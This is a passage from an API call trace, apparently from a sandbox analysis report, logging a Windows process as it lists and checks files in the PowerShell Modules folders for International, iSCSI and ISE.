(dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.237] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0226.237] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41 [0226.237] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.238] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.238] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0226.238] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.238] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.238] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0226.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.238] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.239] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.239] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.239] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International", lpFilePart=0x0) returned 0x40 [0226.239] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\", lpFilePart=0x0) returned 0x41 [0226.239] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.239] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.240] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 1 [0226.240] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397, dwReserved0=0x0, dwReserved1=0x0, cFileName="International.psd1", cAlternateFileName="")) returned 0 [0226.240] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.240] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1")) returned 0x20 [0226.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.240] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0226.240] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) returned 0x39 [0226.240] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf850 [0226.241] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.241] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0226.241] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0226.241] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0226.242] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0226.242] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 1 [0226.242] FindNextFileW (in: hFindFile=0x1a5cf850, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 0 [0226.242] FindClose (in: hFindFile=0x1a5cf850 | out: hFindFile=0x1a5cf850) returned 1 [0226.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.242] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0226.242] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) returned 0x39 [0226.243] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.243] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.243] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0226.243] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0226.243] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0226.243] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0226.244] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 1 [0226.244] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.244] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.244] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0226.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.244] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.244] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI", lpFilePart=0x0) returned 0x38 [0226.244] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\", lpFilePart=0x0) returned 0x39 [0226.244] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf730 [0226.245] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.245] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI.psd1", cAlternateFileName="")) returned 1 [0226.245] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x185a, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSIConnection.cdxml", cAlternateFileName="")) returned 1 [0226.245] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSISession.cdxml", cAlternateFileName="")) returned 1 [0226.245] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16774d47, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x16774d47, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x16774d47, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a86, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITarget.cdxml", cAlternateFileName="")) returned 1 [0226.246] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 1 [0226.246] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x328f, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSITargetPortal.cdxml", cAlternateFileName="")) returned 0 [0226.246] FindClose (in: hFindFile=0x1a5cf730 | out: hFindFile=0x1a5cf730) returned 1 [0226.246] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.246] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.246] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1")) returned 0x20 [0226.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.246] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0226.246] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\", lpFilePart=0x0) returned 0x37 [0226.247] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\ISE\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, 